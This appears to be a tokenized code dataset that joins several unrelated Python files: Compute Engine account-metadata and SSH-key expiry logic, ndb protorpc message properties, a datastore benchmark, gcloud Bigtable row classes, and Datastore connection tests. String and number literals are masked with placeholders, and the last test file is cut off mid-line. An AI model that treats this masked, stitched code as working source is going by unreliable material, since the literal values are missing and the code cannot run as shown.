<s> """<STR_LIT>""" <EOL> import datetime <EOL> import json <EOL> import logging <EOL> import time <EOL> import urllib2 <EOL> METADATA_URL = '<STR_LIT>' <EOL> METADATA_HANG = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def KeyHasExpired ( key ) : <EOL> """<STR_LIT>""" <EOL> logging . debug ( '<STR_LIT>' , key ) <EOL> try : <EOL> schema , json_str = key . split ( None , <NUM_LIT:3> ) [ <NUM_LIT:2> : ] <EOL> except ValueError : <EOL> logging . debug ( '<STR_LIT>' ) <EOL> logging . debug ( '<STR_LIT>' ) <EOL> return False <EOL> if schema != '<STR_LIT>' : <EOL> logging . debug ( '<STR_LIT>' , schema ) <EOL> return False <EOL> logging . debug ( '<STR_LIT>' ) <EOL> logging . debug ( '<STR_LIT>' , json_str ) <EOL> try : <EOL> json_obj = json . loads ( json_str ) <EOL> except ValueError : <EOL> logging . error ( '<STR_LIT>' ) <EOL> return False <EOL> if '<STR_LIT>' not in json_obj : <EOL> logging . warning ( '<STR_LIT>' ) <EOL> return False <EOL> expire_str = json_obj [ '<STR_LIT>' ] <EOL> format_str = '<STR_LIT>' <EOL> try : <EOL> expire_time = datetime . datetime . strptime ( expire_str , format_str ) <EOL> except ValueError : <EOL> logging . error ( <EOL> '<STR_LIT>' , expire_str , format_str ) <EOL> logging . error ( '<STR_LIT>' ) <EOL> return False <EOL> return datetime . datetime . utcnow ( ) > expire_time <EOL> def AccountDataToDictionary ( data ) : <EOL> """<STR_LIT>""" <EOL> if not data : <EOL> return { } <EOL> lines = [ line for line in data . splitlines ( ) if line ] <EOL> usermap = { } <EOL> for line in lines : <EOL> split_line = line . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> if len ( split_line ) != <NUM_LIT:2> : <EOL> logging . warning ( <EOL> '<STR_LIT>' , split_line ) <EOL> continue <EOL> user , key = split_line <EOL> if KeyHasExpired ( key ) : <EOL> logging . debug ( <EOL> '<STR_LIT>' , user , key ) <EOL> continue <EOL> if user not in usermap : <EOL> usermap [ user ] = [ ] <EOL> usermap [ user ] . append ( key ) <EOL> logging . 
debug ( '<STR_LIT>' , usermap ) <EOL> return usermap <EOL> class DesiredAccounts ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , time_module = time , urllib2_module = urllib2 ) : <EOL> self . urllib2 = urllib2_module <EOL> self . time = time_module <EOL> self . etag = <NUM_LIT:0> <EOL> def _WaitForUpdate ( self , timeout_secs ) : <EOL> """<STR_LIT>""" <EOL> request_url = METADATA_URL + METADATA_HANG % ( timeout_secs , self . etag ) <EOL> logging . debug ( '<STR_LIT>' , request_url ) <EOL> request = urllib2 . Request ( request_url ) <EOL> request . add_header ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return self . urllib2 . urlopen ( request , timeout = timeout_secs * <NUM_LIT> ) <EOL> def _GetMetadataUpdate ( self , timeout_secs = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> response = self . _WaitForUpdate ( timeout_secs = timeout_secs ) <EOL> response_info = response . info ( ) <EOL> if response_info and response_info . has_key ( '<STR_LIT>' ) : <EOL> self . etag = response_info . getheader ( '<STR_LIT>' ) <EOL> content = response . read ( ) <EOL> logging . debug ( '<STR_LIT>' , content ) <EOL> return content <EOL> except urllib2 . HTTPError as e : <EOL> if e . code == <NUM_LIT> : <EOL> return None <EOL> raise <EOL> return None <EOL> def GetDesiredAccounts ( self ) : <EOL> """<STR_LIT>""" <EOL> logging . debug ( '<STR_LIT>' ) <EOL> metadata_content = self . _GetMetadataUpdate ( ) <EOL> metadata_dict = json . loads ( metadata_content or '<STR_LIT:{}>' ) <EOL> account_data = None <EOL> try : <EOL> instance_data = metadata_dict [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> project_data = metadata_dict [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> valid_keys = [ instance_data . get ( '<STR_LIT>' ) , instance_data . get ( '<STR_LIT>' ) ] <EOL> block_project = instance_data . get ( '<STR_LIT>' , '<STR_LIT>' ) . lower ( ) <EOL> if block_project != '<STR_LIT:true>' and not instance_data . get ( '<STR_LIT>' ) : <EOL> valid_keys . append ( project_data . 
get ( '<STR_LIT>' ) ) <EOL> valid_keys . append ( project_data . get ( '<STR_LIT>' ) ) <EOL> valid_keys = [ key for key in valid_keys if key ] <EOL> account_data = '<STR_LIT:\n>' . join ( valid_keys ) <EOL> except KeyError : <EOL> logging . debug ( '<STR_LIT>' ) <EOL> return AccountDataToDictionary ( account_data ) </s>
"""<STR_LIT>"""

__pychecker__ = '<STR_LIT>'

import logging
import subprocess
import unittest
import uuid

from gcimagebundlelib import utils


class ImageBundleTest(unittest.TestCase):

    def testRunCommand(self):
        """A well-formed command runs to completion without raising."""
        utils.RunCommand(['<STR_LIT>', '<STR_LIT:/>'])

    def testRunCommandThatFails(self):
        """A failing command raises subprocess.CalledProcessError."""
        # A random hex suffix guarantees the path does not exist.
        non_existent_path = '<STR_LIT:/>' + uuid.uuid4().hex
        self.assertRaises(
            subprocess.CalledProcessError,
            utils.RunCommand,
            ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', non_existent_path])


def main():
    logging.basicConfig(level=logging.DEBUG)
    unittest.main()


if __name__ == '<STR_LIT:__main__>':
    main()
<s> """<STR_LIT>""" <EOL> from protorpc import messages <EOL> from protorpc import remote <EOL> from . import model <EOL> from . import utils <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> _protocols_registry = remote . Protocols . new_default ( ) <EOL> _default_protocol = '<STR_LIT>' <EOL> class EnumProperty ( model . IntegerProperty ) : <EOL> """<STR_LIT>""" <EOL> _enum_type = None <EOL> _attributes = [ '<STR_LIT>' ] + model . IntegerProperty . _attributes <EOL> _positional = <NUM_LIT:1> + model . IntegerProperty . _positional <EOL> @ utils . positional ( <NUM_LIT:1> + _positional ) <EOL> def __init__ ( self , enum_type , name = None , default = None , choices = None , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> self . _enum_type = enum_type <EOL> if default is not None : <EOL> self . _validate ( default ) <EOL> if choices is not None : <EOL> map ( self . _validate , choices ) <EOL> super ( EnumProperty , self ) . __init__ ( name , default = default , <EOL> choices = choices , ** kwds ) <EOL> def _validate ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( value , self . _enum_type ) : <EOL> raise TypeError ( '<STR_LIT>' % <EOL> ( self . _enum_type . __name__ , value ) ) <EOL> def _to_base_type ( self , enum ) : <EOL> """<STR_LIT>""" <EOL> return enum . number <EOL> def _from_base_type ( self , val ) : <EOL> """<STR_LIT>""" <EOL> return self . _enum_type ( val ) <EOL> def _analyze_indexed_fields ( indexed_fields ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> for field_name in indexed_fields : <EOL> if not isinstance ( field_name , basestring ) : <EOL> raise TypeError ( '<STR_LIT>' % ( field_name , ) ) <EOL> if '<STR_LIT:.>' not in field_name : <EOL> if field_name in result : <EOL> raise ValueError ( '<STR_LIT>' % field_name ) <EOL> result [ field_name ] = None <EOL> else : <EOL> head , tail = field_name . 
split ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> if head not in result : <EOL> result [ head ] = [ tail ] <EOL> elif result [ head ] is None : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( field_name , head ) ) <EOL> else : <EOL> result [ head ] . append ( tail ) <EOL> return result <EOL> def _make_model_class ( message_type , indexed_fields , ** props ) : <EOL> """<STR_LIT>""" <EOL> analyzed = _analyze_indexed_fields ( indexed_fields ) <EOL> for field_name , sub_fields in analyzed . iteritems ( ) : <EOL> if field_name in props : <EOL> raise ValueError ( '<STR_LIT>' % field_name ) <EOL> try : <EOL> field = message_type . field_by_name ( field_name ) <EOL> except KeyError : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( message_type . __name__ , field_name ) ) <EOL> if isinstance ( field , messages . MessageField ) : <EOL> if not sub_fields : <EOL> raise ValueError ( <EOL> '<STR_LIT>' % field_name ) <EOL> sub_model_class = _make_model_class ( field . type , sub_fields ) <EOL> prop = model . StructuredProperty ( sub_model_class , field_name , <EOL> repeated = field . repeated ) <EOL> else : <EOL> if sub_fields is not None : <EOL> raise ValueError ( <EOL> '<STR_LIT>' % field_name ) <EOL> if isinstance ( field , messages . EnumField ) : <EOL> prop = EnumProperty ( field . type , field_name , repeated = field . repeated ) <EOL> elif isinstance ( field , messages . BytesField ) : <EOL> prop = model . BlobProperty ( field_name , <EOL> repeated = field . repeated , indexed = True ) <EOL> else : <EOL> prop = model . GenericProperty ( field_name , repeated = field . repeated ) <EOL> props [ field_name ] = prop <EOL> return model . MetaModel ( '<STR_LIT>' % message_type . __name__ , <EOL> ( model . Model , ) , props ) <EOL> class MessageProperty ( model . StructuredProperty ) : <EOL> """<STR_LIT>""" <EOL> _message_type = None <EOL> _indexed_fields = ( ) <EOL> _protocol = _default_protocol <EOL> _protocol_impl = None <EOL> _attributes = ( [ '<STR_LIT>' ] + model . 
StructuredProperty . _attributes [ <NUM_LIT:1> : ] + <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ utils . positional ( <NUM_LIT:1> + model . StructuredProperty . _positional ) <EOL> def __init__ ( self , message_type , name = None , <EOL> indexed_fields = None , protocol = None , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( message_type , type ) and <EOL> issubclass ( message_type , messages . Message ) ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> self . _message_type = message_type <EOL> if indexed_fields is not None : <EOL> self . _indexed_fields = tuple ( indexed_fields ) <EOL> if protocol is None : <EOL> protocol = _default_protocol <EOL> self . _protocol = protocol <EOL> self . _protocol_impl = _protocols_registry . lookup_by_name ( protocol ) <EOL> blob_prop = model . BlobProperty ( '<STR_LIT>' % self . _protocol ) <EOL> message_class = _make_model_class ( message_type , self . _indexed_fields , <EOL> blob_ = blob_prop ) <EOL> super ( MessageProperty , self ) . __init__ ( message_class , name , ** kwds ) <EOL> def _validate ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( msg , self . _message_type ) : <EOL> raise TypeError ( '<STR_LIT>' , <EOL> self . _message_type . __name__ , <EOL> self . _code_name or self . _name ) <EOL> def _to_base_type ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> ent = _message_to_entity ( msg , self . _modelclass ) <EOL> ent . blob_ = self . _protocol_impl . encode_message ( msg ) <EOL> return ent <EOL> def _from_base_type ( self , ent ) : <EOL> """<STR_LIT>""" <EOL> if ent . _projection : <EOL> return _projected_entity_to_message ( ent , self . _message_type ) <EOL> blob = ent . blob_ <EOL> if blob is not None : <EOL> protocol = self . _protocol_impl <EOL> else : <EOL> protocol = None <EOL> for name in _protocols_registry . names : <EOL> key = '<STR_LIT>' % name <EOL> if key in ent . _values : <EOL> blob = ent . _values [ key ] <EOL> if isinstance ( blob , model . 
_BaseValue ) : <EOL> blob = blob . b_val <EOL> protocol = _protocols_registry . lookup_by_name ( name ) <EOL> break <EOL> if blob is None or protocol is None : <EOL> return None <EOL> msg = protocol . decode_message ( self . _message_type , blob ) <EOL> return msg <EOL> def _message_to_entity ( msg , modelclass ) : <EOL> """<STR_LIT>""" <EOL> ent = modelclass ( ) <EOL> for prop_name , prop in modelclass . _properties . iteritems ( ) : <EOL> if prop . _code_name == '<STR_LIT>' : <EOL> continue <EOL> value = getattr ( msg , prop_name ) <EOL> if value is not None and isinstance ( prop , model . StructuredProperty ) : <EOL> if prop . _repeated : <EOL> value = [ _message_to_entity ( v , prop . _modelclass ) for v in value ] <EOL> else : <EOL> value = _message_to_entity ( value , prop . _modelclass ) <EOL> setattr ( ent , prop_name , value ) <EOL> return ent <EOL> def _projected_entity_to_message ( ent , message_type ) : <EOL> """<STR_LIT>""" <EOL> msg = message_type ( ) <EOL> analyzed = _analyze_indexed_fields ( ent . _projection ) <EOL> for name , sublist in analyzed . iteritems ( ) : <EOL> prop = ent . _properties [ name ] <EOL> val = prop . _get_value ( ent ) <EOL> assert isinstance ( prop , model . StructuredProperty ) == bool ( sublist ) <EOL> if sublist : <EOL> field = message_type . field_by_name ( name ) <EOL> assert isinstance ( field , messages . MessageField ) <EOL> assert prop . _repeated == field . repeated <EOL> if prop . _repeated : <EOL> assert isinstance ( val , list ) <EOL> val = [ _projected_entity_to_message ( v , field . type ) for v in val ] <EOL> else : <EOL> assert isinstance ( val , prop . _modelclass ) <EOL> val = _projected_entity_to_message ( val , field . type ) <EOL> setattr ( msg , name , val ) <EOL> return msg </s>
<s> """<STR_LIT>""" <EOL> import cProfile <EOL> import os <EOL> import pstats <EOL> import sys <EOL> import time <EOL> from google . appengine . ext import testbed <EOL> tb = testbed . Testbed ( ) <EOL> tb . activate ( ) <EOL> tb . init_datastore_v3_stub ( ) <EOL> tb . init_memcache_stub ( ) <EOL> from google . appengine . ext import db <EOL> import ndb <EOL> N = <NUM_LIT:1000> <EOL> class Person ( db . Model ) : <EOL> a0 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> a1 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> a2 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> a3 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> a4 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> a5 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> a6 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> a7 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> a8 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> a9 = db . StringProperty ( default = '<STR_LIT>' ) <EOL> OldPerson = Person <EOL> class Person ( ndb . Model ) : <EOL> a0 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> a1 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> a2 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> a3 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> a4 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> a5 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> a6 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> a7 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> a8 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> a9 = ndb . StringProperty ( default = '<STR_LIT>' ) <EOL> NewPerson = Person <EOL> def put_old ( people ) : <EOL> keys = db . put ( people ) <EOL> def put_new ( people ) : <EOL> keys = ndb . put_multi ( people , use_cache = False , use_memcache = False ) <EOL> def timer ( func , people ) : <EOL> t0 = time . time ( ) <EOL> func ( people ) <EOL> t1 = time . 
time ( ) <EOL> print '<STR_LIT>' % ( t1 - t0 ) <EOL> def main ( k = <NUM_LIT:0> ) : <EOL> if k > <NUM_LIT:0> : <EOL> return main ( k - <NUM_LIT:1> ) <EOL> try : <EOL> n = int ( sys . argv [ - <NUM_LIT:1> ] ) <EOL> except : <EOL> n = N <EOL> if '<STR_LIT>' in sys . argv and '<STR_LIT>' not in sys . argv : <EOL> people = [ OldPerson ( ) for i in xrange ( n ) ] <EOL> func = put_old <EOL> elif '<STR_LIT>' in sys . argv and '<STR_LIT>' not in sys . argv : <EOL> people = [ NewPerson ( ) for i in xrange ( n ) ] <EOL> func = put_new <EOL> else : <EOL> sys . stderr . write ( '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> prof = cProfile . Profile ( ) <EOL> prof = prof . runctx ( '<STR_LIT>' , globals ( ) , locals ( ) ) <EOL> stats = pstats . Stats ( prof ) <EOL> stats . strip_dirs ( ) <EOL> stats . sort_stats ( '<STR_LIT>' ) <EOL> stats . print_stats ( <NUM_LIT:20> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( <NUM_LIT:9> ) </s>
import os

import setuptools

README_FILENAME = os.path.join(os.path.dirname(__file__), '<STR_LIT>')

# Read the long description via a context manager so the file handle is
# closed promptly (the original left it to be reclaimed by the GC).
with open(README_FILENAME) as readme_file:
    LONG_DESCRIPTION = readme_file.read()

setuptools.setup(
    name='<STR_LIT>',
    version='<STR_LIT>',
    description='<STR_LIT>',
    long_description=LONG_DESCRIPTION,
    url='<STR_LIT>',
    license='<STR_LIT>',
    author='<STR_LIT>',
    author_email='<STR_LIT>',
    classifiers=[
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
    ],
    packages=setuptools.find_packages(exclude=['<STR_LIT>', '<STR_LIT>']),
)
<s> """<STR_LIT>""" <EOL> from gcloud . bigtable . client import Client </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> import six <EOL> from gcloud . _helpers import _datetime_from_microseconds <EOL> from gcloud . _helpers import _to_bytes <EOL> class Cell ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , value , timestamp , labels = ( ) ) : <EOL> self . value = value <EOL> self . timestamp = timestamp <EOL> self . labels = list ( labels ) <EOL> @ classmethod <EOL> def from_pb ( cls , cell_pb ) : <EOL> """<STR_LIT>""" <EOL> timestamp = _datetime_from_microseconds ( cell_pb . timestamp_micros ) <EOL> if cell_pb . labels : <EOL> return cls ( cell_pb . value , timestamp , labels = cell_pb . labels ) <EOL> else : <EOL> return cls ( cell_pb . value , timestamp ) <EOL> def __eq__ ( self , other ) : <EOL> if not isinstance ( other , self . __class__ ) : <EOL> return False <EOL> return ( other . value == self . value and <EOL> other . timestamp == self . timestamp and <EOL> other . labels == self . labels ) <EOL> def __ne__ ( self , other ) : <EOL> return not self . __eq__ ( other ) <EOL> class PartialRowData ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , row_key ) : <EOL> self . _row_key = row_key <EOL> self . _cells = { } <EOL> self . _committed = False <EOL> self . _chunks_encountered = False <EOL> def __eq__ ( self , other ) : <EOL> if not isinstance ( other , self . __class__ ) : <EOL> return False <EOL> return ( other . _row_key == self . _row_key and <EOL> other . _committed == self . _committed and <EOL> other . _chunks_encountered == self . _chunks_encountered and <EOL> other . _cells == self . _cells ) <EOL> def __ne__ ( self , other ) : <EOL> return not self . __eq__ ( other ) <EOL> def to_dict ( self ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> for column_family_id , columns in six . iteritems ( self . _cells ) : <EOL> for column_qual , cells in six . 
iteritems ( columns ) : <EOL> key = ( _to_bytes ( column_family_id ) + b'<STR_LIT::>' + <EOL> _to_bytes ( column_qual ) ) <EOL> result [ key ] = cells <EOL> return result <EOL> @ property <EOL> def cells ( self ) : <EOL> """<STR_LIT>""" <EOL> return copy . deepcopy ( self . _cells ) <EOL> @ property <EOL> def row_key ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _row_key <EOL> @ property <EOL> def committed ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _committed <EOL> def clear ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _committed = False <EOL> self . _chunks_encountered = False <EOL> self . _cells . clear ( ) <EOL> def _handle_commit_row ( self , chunk , index , last_chunk_index ) : <EOL> """<STR_LIT>""" <EOL> if not chunk . commit_row : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if index != last_chunk_index : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> else : <EOL> self . _committed = True <EOL> def _handle_reset_row ( self , chunk ) : <EOL> """<STR_LIT>""" <EOL> if not chunk . reset_row : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . clear ( ) <EOL> def _handle_row_contents ( self , chunk ) : <EOL> """<STR_LIT>""" <EOL> column_family_id = chunk . row_contents . name <EOL> column_family_dict = self . _cells . setdefault ( column_family_id , { } ) <EOL> for column in chunk . row_contents . columns : <EOL> cells = [ Cell . from_pb ( cell ) for cell in column . cells ] <EOL> column_name = column . qualifier <EOL> column_cells = column_family_dict . setdefault ( column_name , [ ] ) <EOL> column_cells . extend ( cells ) <EOL> def update_from_read_rows ( self , read_rows_response_pb ) : <EOL> """<STR_LIT>""" <EOL> if self . _committed : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if read_rows_response_pb . row_key != self . row_key : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( read_rows_response_pb . row_key , <EOL> self . row_key ) ) <EOL> last_chunk_index = len ( read_rows_response_pb . 
chunks ) - <NUM_LIT:1> <EOL> for index , chunk in enumerate ( read_rows_response_pb . chunks ) : <EOL> chunk_property = chunk . WhichOneof ( '<STR_LIT>' ) <EOL> if chunk_property == '<STR_LIT>' : <EOL> self . _handle_row_contents ( chunk ) <EOL> elif chunk_property == '<STR_LIT>' : <EOL> self . _handle_reset_row ( chunk ) <EOL> elif chunk_property == '<STR_LIT>' : <EOL> self . _handle_commit_row ( chunk , index , last_chunk_index ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % ( <EOL> chunk_property , ) ) <EOL> self . _chunks_encountered = True <EOL> class PartialRowsData ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , response_iterator ) : <EOL> self . _response_iterator = response_iterator <EOL> self . _rows = { } <EOL> def __eq__ ( self , other ) : <EOL> if not isinstance ( other , self . __class__ ) : <EOL> return False <EOL> return other . _response_iterator == self . _response_iterator <EOL> def __ne__ ( self , other ) : <EOL> return not self . __eq__ ( other ) <EOL> @ property <EOL> def rows ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _rows <EOL> def cancel ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _response_iterator . cancel ( ) <EOL> def consume_next ( self ) : <EOL> """<STR_LIT>""" <EOL> read_rows_response = self . _response_iterator . next ( ) <EOL> row_key = read_rows_response . row_key <EOL> partial_row = self . _rows . get ( row_key ) <EOL> if partial_row is None : <EOL> partial_row = self . _rows [ row_key ] = PartialRowData ( row_key ) <EOL> partial_row . update_from_read_rows ( read_rows_response ) <EOL> def consume_all ( self , max_loops = None ) : <EOL> """<STR_LIT>""" <EOL> curr_loop = <NUM_LIT:0> <EOL> if max_loops is None : <EOL> max_loops = float ( '<STR_LIT>' ) <EOL> while curr_loop < max_loops : <EOL> curr_loop += <NUM_LIT:1> <EOL> try : <EOL> self . consume_next ( ) <EOL> except StopIteration : <EOL> break </s>
<s> import unittest2 <EOL> class TestConnection ( unittest2 . TestCase ) : <EOL> def _getTargetClass ( self ) : <EOL> from gcloud . datastore . connection import Connection <EOL> return Connection <EOL> def _make_key_pb ( self , project , id_ = <NUM_LIT> ) : <EOL> from gcloud . datastore . key import Key <EOL> path_args = ( '<STR_LIT>' , ) <EOL> if id_ is not None : <EOL> path_args += ( id_ , ) <EOL> return Key ( * path_args , project = project ) . to_protobuf ( ) <EOL> def _make_query_pb ( self , kind ) : <EOL> from gcloud . datastore . _generated import query_pb2 <EOL> pb = query_pb2 . Query ( ) <EOL> pb . kind . add ( ) . name = kind <EOL> return pb <EOL> def _makeOne ( self , * args , ** kw ) : <EOL> return self . _getTargetClass ( ) ( * args , ** kw ) <EOL> def _verifyProtobufCall ( self , called_with , URI , conn ) : <EOL> self . assertEqual ( called_with [ '<STR_LIT>' ] , URI ) <EOL> self . assertEqual ( called_with [ '<STR_LIT>' ] , '<STR_LIT:POST>' ) <EOL> self . assertEqual ( called_with [ '<STR_LIT>' ] [ '<STR_LIT:Content-Type>' ] , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( called_with [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> conn . USER_AGENT ) <EOL> def test_default_url ( self ) : <EOL> klass = self . _getTargetClass ( ) <EOL> conn = self . _makeOne ( ) <EOL> self . assertEqual ( conn . api_base_url , klass . API_BASE_URL ) <EOL> def test_custom_url_from_env ( self ) : <EOL> import os <EOL> from gcloud . _testing import _Monkey <EOL> from gcloud . connection import API_BASE_URL <EOL> from gcloud . environment_vars import GCD_HOST <EOL> HOST = '<STR_LIT>' <EOL> fake_environ = { GCD_HOST : HOST } <EOL> with _Monkey ( os , environ = fake_environ ) : <EOL> conn = self . _makeOne ( ) <EOL> self . assertNotEqual ( conn . api_base_url , API_BASE_URL ) <EOL> self . assertEqual ( conn . api_base_url , HOST + '<STR_LIT>' ) <EOL> def test_custom_url_from_constructor ( self ) : <EOL> from gcloud . 
connection import API_BASE_URL <EOL> HOST = object ( ) <EOL> conn = self . _makeOne ( api_base_url = HOST ) <EOL> self . assertNotEqual ( conn . api_base_url , API_BASE_URL ) <EOL> self . assertEqual ( conn . api_base_url , HOST ) <EOL> def test_custom_url_constructor_and_env ( self ) : <EOL> import os <EOL> from gcloud . _testing import _Monkey <EOL> from gcloud . connection import API_BASE_URL <EOL> from gcloud . environment_vars import GCD_HOST <EOL> HOST1 = object ( ) <EOL> HOST2 = object ( ) <EOL> fake_environ = { GCD_HOST : HOST1 } <EOL> with _Monkey ( os , environ = fake_environ ) : <EOL> conn = self . _makeOne ( api_base_url = HOST2 ) <EOL> self . assertNotEqual ( conn . api_base_url , API_BASE_URL ) <EOL> self . assertNotEqual ( conn . api_base_url , HOST1 ) <EOL> self . assertEqual ( conn . api_base_url , HOST2 ) <EOL> def test_ctor_defaults ( self ) : <EOL> conn = self . _makeOne ( ) <EOL> self . assertEqual ( conn . credentials , None ) <EOL> def test_ctor_explicit ( self ) : <EOL> class Creds ( object ) : <EOL> def create_scoped_required ( self ) : <EOL> return False <EOL> creds = Creds ( ) <EOL> conn = self . _makeOne ( creds ) <EOL> self . assertTrue ( conn . credentials is creds ) <EOL> def test_http_w_existing ( self ) : <EOL> conn = self . _makeOne ( ) <EOL> conn . _http = http = object ( ) <EOL> self . assertTrue ( conn . http is http ) <EOL> def test_http_wo_creds ( self ) : <EOL> import httplib2 <EOL> conn = self . _makeOne ( ) <EOL> self . assertTrue ( isinstance ( conn . http , httplib2 . Http ) ) <EOL> def test_http_w_creds ( self ) : <EOL> import httplib2 <EOL> authorized = object ( ) <EOL> class Creds ( object ) : <EOL> def authorize ( self , http ) : <EOL> self . _called_with = http <EOL> return authorized <EOL> def create_scoped_required ( self ) : <EOL> return False <EOL> creds = Creds ( ) <EOL> conn = self . _makeOne ( creds ) <EOL> self . assertTrue ( conn . http is authorized ) <EOL> self . assertTrue ( isinstance ( creds . 
_called_with , httplib2 . Http ) ) <EOL> def test__request_w_200 ( self ) : <EOL> PROJECT = '<STR_LIT>' <EOL> METHOD = '<STR_LIT>' <EOL> DATA = b'<STR_LIT>' <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT::>' + METHOD , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , '<STR_LIT>' ) <EOL> self . assertEqual ( conn . _request ( PROJECT , METHOD , DATA ) , '<STR_LIT>' ) <EOL> self . _verifyProtobufCall ( http . _called_with , URI , conn ) <EOL> self . assertEqual ( http . _called_with [ '<STR_LIT:body>' ] , DATA ) <EOL> def test__request_not_200 ( self ) : <EOL> from gcloud . exceptions import BadRequest <EOL> from google . rpc import status_pb2 <EOL> error = status_pb2 . Status ( ) <EOL> error . message = '<STR_LIT>' <EOL> error . code = <NUM_LIT:9> <EOL> PROJECT = '<STR_LIT>' <EOL> METHOD = '<STR_LIT>' <EOL> DATA = '<STR_LIT>' <EOL> conn = self . _makeOne ( ) <EOL> conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , error . SerializeToString ( ) ) <EOL> with self . assertRaises ( BadRequest ) as e : <EOL> conn . _request ( PROJECT , METHOD , DATA ) <EOL> expected_message = '<STR_LIT>' <EOL> self . assertEqual ( str ( e . exception ) , expected_message ) <EOL> def test__rpc ( self ) : <EOL> class ReqPB ( object ) : <EOL> def SerializeToString ( self ) : <EOL> return REQPB <EOL> class RspPB ( object ) : <EOL> def __init__ ( self , pb ) : <EOL> self . _pb = pb <EOL> @ classmethod <EOL> def FromString ( cls , pb ) : <EOL> return cls ( pb ) <EOL> REQPB = b'<STR_LIT>' <EOL> PROJECT = '<STR_LIT>' <EOL> METHOD = '<STR_LIT>' <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT::>' + METHOD , <EOL> ] ) <EOL> http = conn . 
_http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , '<STR_LIT>' ) <EOL> response = conn . _rpc ( PROJECT , METHOD , ReqPB ( ) , RspPB ) <EOL> self . assertTrue ( isinstance ( response , RspPB ) ) <EOL> self . assertEqual ( response . _pb , '<STR_LIT>' ) <EOL> self . _verifyProtobufCall ( http . _called_with , URI , conn ) <EOL> self . assertEqual ( http . _called_with [ '<STR_LIT:body>' ] , REQPB ) <EOL> def test_build_api_url_w_default_base_version ( self ) : <EOL> PROJECT = '<STR_LIT>' <EOL> METHOD = '<STR_LIT>' <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT::>' + METHOD , <EOL> ] ) <EOL> self . assertEqual ( conn . build_api_url ( PROJECT , METHOD ) , URI ) <EOL> def test_build_api_url_w_explicit_base_version ( self ) : <EOL> BASE = '<STR_LIT>' <EOL> VER = '<STR_LIT>' <EOL> PROJECT = '<STR_LIT>' <EOL> METHOD = '<STR_LIT>' <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> BASE , <EOL> VER , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT::>' + METHOD , <EOL> ] ) <EOL> self . 